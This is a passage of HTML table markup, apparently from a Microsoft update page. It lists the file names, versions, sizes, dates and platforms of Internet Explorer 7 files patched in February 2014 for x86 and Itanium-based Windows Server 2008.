class=\"sbody-td\">498,688</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">26-Sep-2013</td><td class=\"sbody-td\">12:41</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">498,688</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">09-Sep-2011</td><td class=\"sbody-td\">11:34</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.19041</td><td class=\"sbody-td\">389,632</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:13</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.23330</td><td class=\"sbody-td\">390,144</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:15</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">480,256</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">480,256</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">3,627,008</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:04</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">3,628,032</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:54</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">271,872</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">129,024</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">272,384</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">129,024</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">53,760</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">53,760</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">6,119,424</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">180,736</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">6,120,960</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">180,736</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieinstal.exe</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">282,624</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieinstal.exe</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">282,624</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">304,128</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">304,128</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 7 on all supported Itanium-based versions of Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">2,615,296</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:52</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">2,616,320</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">2,234,368</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:50</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">2,234,368</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:37</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">62,464</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:48</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">62,464</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:35</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">81,920</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:50</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">1,924,096</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:52</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">181,760</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:52</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">81,920</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:36</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">1,940,992</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">181,760</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">14-Feb-2014</td><td class=\"sbody-td\">11:08</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">1,074,688</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:49</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">14-Feb-2014</td><td class=\"sbody-td\">11:08</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">1,074,688</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:36</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">460,800</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:49</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">461,312</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:36</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">1,045,504</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:50</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">14-Feb-2014</td><td class=\"sbody-td\">11:22</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">1,045,504</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:36</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">14-Feb-2014</td><td class=\"sbody-td\">11:23</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.19041</td><td class=\"sbody-td\">965,632</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:42</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.23330</td><td class=\"sbody-td\">965,632</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:59</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">1,533,952</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:50</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">1,534,464</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:37</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">10,160,128</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:50</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">10,161,664</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:37</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:34</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">564,736</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:49</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">409,088</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:51</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">564,736</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:36</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">409,088</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">2,192,896</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:52</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">2,192,896</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">130,048</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:52</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">130,048</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">210,432</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:49</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">210,432</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:36</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">11,790,848</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:49</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">532,992</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:49</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">11,794,944</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:36</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">532,992</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:36</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieinstal.exe</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">378,368</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:09</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieinstal.exe</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">378,368</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:35</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">476,672</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:09</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">476,672</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:35</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">1,177,600</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">1,178,624</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">19,456</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">19,456</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">834,048</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">842,240</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">26-Sep-2013</td><td class=\"sbody-td\">12:35</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">24-May-2013</td><td class=\"sbody-td\">17:09</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">498,688</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">26-Sep-2013</td><td class=\"sbody-td\">12:41</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">498,688</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">09-Sep-2011</td><td class=\"sbody-td\">11:34</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.19041</td><td class=\"sbody-td\">389,632</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:13</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.23330</td><td class=\"sbody-td\">390,144</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:15</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">480,256</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">480,256</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td 